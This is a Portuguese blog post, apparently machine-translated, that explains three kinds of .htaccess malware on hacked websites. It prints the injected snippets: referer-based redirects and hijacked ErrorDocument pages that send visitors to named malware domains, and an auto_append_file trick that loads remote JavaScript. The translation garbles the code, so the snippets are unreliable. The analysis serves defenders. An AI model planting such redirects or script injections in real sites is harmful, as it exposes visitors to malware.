Por que eles usam o arquivo htaccess.? Por várias razões. Primeiro, o htaccess. É um arquivo oculto (começando com um "."), De modo que alguns proprietários do local não poderia encontrá-los em seus clientes de FTP. Em segundo lugar, é um arquivo poderoso que lhe permite fazer várias alterações para o servidor web e comportamento PHP. Isso faz com que a. Htaccess ataque do difíceis de encontrar e de limpar.
1 - Redirecionando usuários provenientes de mecanismos de busca de malwares
Este é o tipo mais simples de htaccess. Ataque, eo que vemos com mais freqüência. Isso é o que é adicionada ao arquivo htaccess de um site hackeado.:RewriteEngine OnComo você pode ver, ele irá verificar a referência de quem visita o site e se o usuário veio de uma pesquisa no Google (ou Yahoo ou Bing ou qualquer motor de busca), ele irá redirecionar o usuário para uma página com malware (neste exemplo http :/ / villusoftreit.ru / in.cgi? 3). Note que se você digitar o site diretamente na barra de endereços do seu navegador, nada vai acontecer. Por quê? Faz mais difícil para o proprietário do site para detectar o ataque, já que eles provavelmente digite o nome do site, e não procurar por ela no Google.
RewriteCond% {HTTP_REFERER}. * Google. * [OR]
RewriteCond% {HTTP_REFERER}. * Perguntar. * [OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * [OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * [OR]
..
RewriteCond% {HTTP_REFERER}. * Linkedin. * [OR]
RewriteCond% {HTTP_REFERER}. * Flickr *.
RewriteRule ^ (. *) $ Http://villusoftreit.ru/in.cgi?3 [R = 301, L]
Abaixo é um outro exemplo do mesmo ataque, mas desta vez para redireccionar http://globalpoweringgatheringon.com/in.php?n=30 (um desses domínios Hilary Kneber). Note-se que este tempo, adicionou they'v centenas de branco espaços antes do "RewriteCond" para torná-lo mais difícil de ver em um editor de texto (Nós removemos abaixo para fazer mais fácil de ler no post).
# BEGIN WordPress
RewriteEngine On
RewriteOptions herdar
RewriteCond% {HTTP_REFERER}. * Ask.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn.com * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing.com * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live.com * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol.com * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista.com * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite.com * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Search.yahoo * $ [NC]
RewriteRule. * Http://globalpoweringgatheringon.com/in.php?n=30 [R, L]
2 - Redirecionando as páginas de erro a malware
Este é o segundo tipo mais comum de. Malwares htaccess. Ao invés de redirecionar todo o tráfego, os atacantes são apenas modificando as páginas de erro para seus próprios domínios (ainda mais difícil de detectar). Isto é o que aparece no htaccess.:RewriteEngine OnOutros exemplos:
Http://powercrystal.ru/inject/index.php 400 ErrorDocument
Http://powercrystal.ru/inject/index.php 401 ErrorDocument
ErrorDocument 403 http://powercrystal.ru/inject/index.php
Http://powercrystal.ru/inject/index.php ErrorDocument 404
Http://powercrystal.ru/inject/index.php 500 ErrorDocument
ErrorDocument 400 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 403 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 404 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 405 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 404 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 405 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 406 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 400 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 403 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 404 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 405 http://nicomagen.cz.cc/ht_er_docs/
3 - Anexação de malwares em um site web
Este tipo de ataque está ficando mais comum recentemente. Em vez de fazer o redirecionamento no arquivo htaccess., Eles modificam o valor PHP "auto_append_file" para carregar malware a partir de um local escondido. Por exemplo:auto_append_file php_value "tmp/13063671977873.php /"Assim, o conteúdo de / tmp/13063671977873.php fica anexado a cada arquivo PHP. Isto é o que o arquivo PHP é semelhante:
<script src="http://nicomagen.cz.cc/jquery.js"> </ script>A malwares javascript comum. Eles às vezes até mesmo anexar imagens falsas para tornar ainda mais difícil de detectar.
Nenhum comentário:
Postar um comentário